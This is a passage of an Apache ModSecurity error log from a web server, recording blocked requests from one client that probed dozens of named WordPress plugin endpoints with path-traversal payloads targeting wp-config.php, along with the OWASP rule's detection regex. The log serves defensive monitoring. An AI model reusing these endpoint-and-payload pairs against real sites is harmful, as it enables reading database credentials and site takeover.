19445:tid 140103457580800] [client 87.249.132.213:34982] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZN-wVEWc94tsnIsHAQ-XTQAAAMU"] [Fri Aug 18 12:54:28.695458 2023] [:error] [pid 18874:tid 140103250806528] [client 87.249.132.213:34984] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php"] [unique_id "ZN-wVFxvK4MFoveIP9_KkAAAAJU"] [Fri Aug 18 12:54:28.791366 2023] [:error] [pid 18872:tid 140103267591936] [client 87.249.132.213:34986] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/bookx/includes/bookx_export.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/bookx/includes/bookx_export.php"] [unique_id "ZN-wVPG_rKmCSnA6LxD5cgAAABM"] [Fri Aug 18 12:54:28.886489 2023] [:error] [pid 18873:tid 140103368304384] [client 87.249.132.213:34988] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/brandfolder/callback.php?wp_abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZN-wVLCcrCl0jrDdhfxXFwAAAEc"] [Fri Aug 18 12:54:28.981001 2023] [:error] [pid 19445:tid 140103351518976] [client 87.249.132.213:34990] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZN-wVEWc94tsnIsHAQ-XTgAAAMk"] [Fri Aug 18 12:54:29.097548 2023] [:error] [pid 18873:tid 140103491151616] [client 87.249.132.213:34992] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php"] [unique_id "ZN-wVbCcrCl0jrDdhfxXGAAAAEE"] [Fri Aug 18 12:54:29.210768 2023] [:error] [pid 18874:tid 140103334733568] [client 87.249.132.213:34994] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/crayon-syntax-highlighter/util/ajax.php?wp_load=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/crayon-syntax-highlighter/util/ajax.php"] [unique_id "ZN-wVVxvK4MFoveIP9_KkQAAAIs"] [Fri Aug 18 12:54:29.306630 2023] [:error] [pid 19445:tid 140103309555456] [client 87.249.132.213:34996] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZN-wVUWc94tsnIsHAQ-XTwAAAM4"] [Fri Aug 18 12:54:29.401698 2023] [:error] [pid 18873:tid 140103457580800] [client 87.249.132.213:34998] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/disclosure-policy-plugin/functions/action.php?delete=asdf&blogUrl=asdf&abspath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/disclosure-policy-plugin/functions/action.php"] [unique_id "ZN-wVbCcrCl0jrDdhfxXGQAAAEU"] [Fri Aug 18 12:54:29.496270 2023] [:error] [pid 18873:tid 140103465973504] [client 87.249.132.213:35000] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=..%2F..%2F..%2Fwp-config.php&currdir=%2Fwp-content%2Fplugins%2Fdm-albums%2F"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dm-albums/dm-albums.php"] [unique_id "ZN-wVbCcrCl0jrDdhfxXGgAAAEQ"] [Fri Aug 18 12:54:29.604880 2023] [:error] [pid 18874:tid 140103234021120] [client 87.249.132.213:35002] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dm-albums/template/album.php"] [unique_id "ZN-wVVxvK4MFoveIP9_KkgAAAJc"] [Fri Aug 18 12:54:29.699372 2023] [:error] [pid 18874:tid 140103465973504] [client 87.249.132.213:35004] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dukapress/lib/dp_image.php?src=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dukapress/lib/dp_image.php"] [unique_id "ZN-wVVxvK4MFoveIP9_KkwAAAIQ"] [Fri Aug 18 12:54:29.797127 2023] [:error] [pid 18874:tid 140103259199232] [client 87.249.132.213:35006] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZN-wVVxvK4MFoveIP9_KlAAAAJQ"] [Fri Aug 18 12:54:29.891868 2023] [:error] [pid 18874:tid 140103275984640] [client 87.249.132.213:35008] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/filedownload/download.php/?path=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/filedownload/download.php/"] [unique_id "ZN-wVVxvK4MFoveIP9_KlQAAAJI"] [Fri Aug 18 12:54:29.986253 2023] [:error] [pid 19445:tid 140103482758912] [client 87.249.132.213:35010] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/google-mp3-audio-player/direct_download.php"] [unique_id "ZN-wVUWc94tsnIsHAQ-XUAAAAMI"] [Fri Aug 18 12:54:30.081386 2023] [:error] [pid 19445:tid 140103234021120] [client 87.249.132.213:35012] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php"] [unique_id "ZN-wVkWc94tsnIsHAQ-XUQAAANc"] [Fri Aug 18 12:54:30.176235 2023] [:error] [pid 19445:tid 140103267591936] [client 87.249.132.213:35014] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php"] [unique_id "ZN-wVkWc94tsnIsHAQ-XUgAAANM"] [Fri Aug 18 12:54:30.270732 2023] [:error] [pid 18874:tid 140103267591936] [client 87.249.132.213:35016] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=..%2F..%2F..%2F..%2Fwp-config.php&file_size=10"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php"] [unique_id "ZN-wVlxvK4MFoveIP9_KlgAAAJM"] [Fri Aug 18 12:54:30.365548 2023] [:error] [pid 18872:tid 140103326340864] [client 87.249.132.213:35018] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/history-collection/download.php?var=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/history-collection/download.php"] [unique_id "ZN-wVvG_rKmCSnA6LxD5cwAAAAw"] [Fri Aug 18 12:54:30.459592 2023] [:error] [pid 18873:tid 140103225628416] [client 87.249.132.213:35020] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ibs-mappro/lib/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ibs-mappro/lib/download.php"] [unique_id "ZN-wVrCcrCl0jrDdhfxXGwAAAFg"] [Fri Aug 18 12:54:30.554643 2023] [:error] [pid 18873:tid 140103474366208] [client 87.249.132.213:35022] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/image-export/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/image-export/download.php"] [unique_id "ZN-wVrCcrCl0jrDdhfxXHAAAAEM"] [Fri Aug 18 12:54:30.648786 2023] [:error] [pid 19445:tid 140103225628416] [client 87.249.132.213:35024] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/imdb-widget/pic.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/imdb-widget/pic.php"] [unique_id "ZN-wVkWc94tsnIsHAQ-XUwAAANg"] [Fri Aug 18 12:54:30.743284 2023] [:error] 